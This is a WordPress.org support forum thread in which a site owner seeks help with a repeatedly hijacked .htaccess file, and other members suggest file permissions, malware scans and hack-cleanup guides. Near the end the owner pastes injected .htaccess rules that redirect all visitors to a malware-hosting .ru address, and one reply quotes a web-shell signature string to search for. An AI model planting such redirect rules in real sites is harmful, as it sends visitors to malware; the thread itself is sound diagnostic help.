WordPress.org

Ready to get started?Download WordPress

Forums

htaccess file problem (14 posts)

  1. jetskiron
    Member
    Posted 2 years ago #

    My website http://www.insuranceclaimhelp.org has been having different kinds of problems such as 404 page not found, 403 Forbidden, posts and replies not showing in side bar pages, pages not available within the site, etc over the last 5 weeks. In the beginning Godaddy and I found that restoring the .htaccess file to earlier 324 byte file solved the problems. But now the htaccess files get overwritten from some unknown source within an hour or minutes of restoring. I have changed the passwords several times and only me an Godaddy has access to the password. Is there a WordPress setting to stop WordPress from overwriting the files, if it is WordPress that is doing it?

  2. MickeyRoush
    Member
    Posted 2 years ago #

    Is there a WordPress setting to stop WordPress from overwriting the files,

    You make sure the .htaccess file is only Readable by all, giving it permissions of 444. But nothing will be able to write to it, which means if you updated your WordPress Permalink structure you would have to change the file permissions back.

    There is something else going on and this is not really an overall solution.

  3. jetskiron
    Member
    Posted 2 years ago #

    Thanks Mickey, is there a place in WordPress Dash panel where I set the permissions of .htaccess? Or does that have to be written into the source code with an editor like Dreamweaver?

    I need a WordPress professional ASAP to figure what is going wrong with my site, and I will pay. Any recommendations?

  4. fonglh
    Member
    Posted 2 years ago #

    Thanks Mickey, is there a place in WordPress Dash panel where I set the permissions of .htaccess? Or does that have to be written into the source code with an editor like Dreamweaver?

    Neither, but you can change it with whatever file management tool Godaddy provides.

    I need a WordPress professional ASAP to figure what is going wrong with my site, and I will pay.

    Post on http://jobs.wordpress.net/

  5. jetskiron
    Member
    Posted 2 years ago #

    Thanks so much. You know I have spent hours on the phone with Godaddy reps and none of them told me this. Amazing!

  6. jetskiron
    Member
    Posted 2 years ago #

    Mickey, I reset the .htaccess file permissions using the Godaddy Hosting control panel to read only and unchecked the write box, but the file got overwritten again???

    I understand WordPress has to update the database on the server as new posts and replies are made, but does WordPress edit or write to other files on the server?

    Does WordPress automatically edit and upload .htaccess files?

    If not, then that would mean that someone at Godaddy is changing the .htaccess file, since I am the only one with the password?

  7. jetskiron
    Member
    Posted 2 years ago #

    Would it be possible to attach a copy of this altered .htaccess file to this post? Or would I just copy paste it here?

  8. noslan
    Member
    Posted 2 years ago #

    if htacces was modiffied once it will be modified again, ask godady to scan your account for suspicious files, it sounds like a php trojan is inside your account :)

  9. MickeyRoush
    Member
    Posted 2 years ago #

    Would it be possible to attach a copy of this altered .htaccess file to this post? Or would I just copy paste it here?

    Forum dictates that you would be better helped if you use the following to display your file contents:
    http://pastebin.com/

    And paste the link to it here in this thread.

    Please replace anything in the file that could reveal your server path, IP address, any information that is specific to your site, etc.

    Mickey, I reset the .htaccess file permissions using the Godaddy Hosting control panel to read only and unchecked the write box, but the file got overwritten again???

    I'm not familiar with the GoDaddy control panel. Does this make it read only for everyone? Are the file permissions 444 for the .htaccess file? WordPress nor anyone else should be able to write to the .htaccess if file permissions are set to 444, unless someone is going right behind you and changing them to be writable again. Just because only you and GoDaddy have your access credentials, does not rule out that something else could be going on, especially if you're on a shared server and some has gained access to it all.

    But, it could also be something little, that is just being overlooked.

  10. jetskiron
    Member
    Posted 2 years ago #

    Bipies, regarding "php trojan inside account":

    9-1-11 1:02 pm - I discovered there was no traffic from search engines to ich.org around 1:00 pm. (I was averaging 700 visits a day before this). Although the ich website came up for "direct" traffic, when it was accessed by clicking on a google and yahoo search results, an error page came up entitled “403 Forbidden”. That error description said the server (Godaddy server) was denying redirection. I called Godaddy 1:02 pm and talked to “Phil” in the SSL department. We discovered the older 324 bite htaccess file had been changed again on 8-31-11 11:30 pm, and to a 4.74 KB file. He also said Godaddy did an automatic virus scan with Norton on the web server when that error page came up and found a virus file called “Trojan.maljava” and he deleted it. He said it was a “trojan mouse script.” I then uploaded the original htaccess 324 bite file at around 2:00 pm. The google search results navigation to ich then worked ok.

    He then sold me Godaddy antivirus “Site Scanner” tool which he said may solve these security problems.

    1. The htaccess file still continues to get overwritten within an hour of uploading the original via ftp, or using Godaddy Restore feature. And even though the Godaddy write permissions box is unchecked for Owner and User.

    2. Is the Site Scanner supposed to scan for Trojan viruses like the Godaddy scanner does?

  11. jetskiron
    Member
    Posted 2 years ago #

    Mickey,

    Godaddy does not have 3 digit numbers for file permissions, only two check boxes to write for "Owner" and "User". I unchecked the owner one, the other one was already unchecked.

  12. noslan
    Member
    Posted 2 years ago #

    so, no way, it a thing (till I know) to check file per file :(, or, if its the same that one I faced with, you can download all your files and search inside them something like:

    "<?php # Web Shell by boff"

    or a file with an extension of php that is 66.3 kb

  13. jetskiron
    Member
    Posted 2 years ago #

    Ok, I have learned how to use the pastebin.com thing :) I have posted at http://pastebin.com/u/jetskiron one original uncorrupted .htaccess file and three corrupted ones. Can anyone tell what is going on?

    The two common elements in the corrupted htaccess files are

    1. a list of serch engines, and

    2. ".ru" elements in the urls. (Its safe to google them for information, but following them in your address bar could close your browsers and install executable malware. I pulled my battery out, rebooted in safe mode, and deleted the .exe file, then ran MS Security Essentials and deleted 5 malware files, which could have been from the .ru urls below ):

    ErrorDocument 400 http://aviable-update.ru/corcas/index.php
    <IfModule mod_rewrite.c>
    RewriteRule ^(.*)$ http://aviable-update.ru/corcas/index.php [R=301,L]
    </IfModule>

    Thanks so much to all :)

  14. MickeyRoush
    Member
    Posted 2 years ago #

    @ jetskiron

    Yep, it looks like your site is/has being hacked.

    I'm not sure if anyone has mentioned these links to you yet.

    http://sitecheck.sucuri.net/scanner/

    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    If you're going to try and clean it up yourself, you need to check out those links. This sort of looks like a timthumb hack/attack. So you probably have more malicious scripts throughout your directories. I could be wrong though. Wish I could help more. :(

Topic Closed

This topic has been closed to new replies.

About this Topic